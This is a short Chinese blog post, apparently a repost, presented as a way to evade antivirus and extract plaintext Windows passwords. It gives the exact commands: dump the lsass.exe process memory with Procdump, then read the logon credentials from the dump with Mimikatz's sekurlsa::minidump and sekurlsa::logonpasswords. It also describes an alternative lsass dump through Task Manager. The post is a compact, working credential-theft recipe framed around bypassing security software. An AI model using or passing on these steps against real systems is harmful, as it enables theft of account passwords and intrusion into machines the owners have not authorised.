利用procdump+Mimikatz 绕过杀软获取Windows明文密码

思路：

 就是通过系统自带的procdump去下载存储用户名密码的文件（应该不能那么说这个文件，但是这样理解没问题），然后用猕猴桃读取。

procdump.exe

Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中.

procdump下载地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

下载dmp命令：

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

会提示保存的地址，然后放到猕猴桃下面

然后使用猕猴桃（Mimikatz）进行读取

读取命令：

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords

「废话」

---

关于dmp的导出也可以是这样的：

1.对于NT6可以使用windows自带的功能进行dump:

任务管理器—进程—显示所有用户进程—找到lsass—右键“创建转储文件”

 

转载于:https://www.cnblogs.com/nul1/p/9285814.html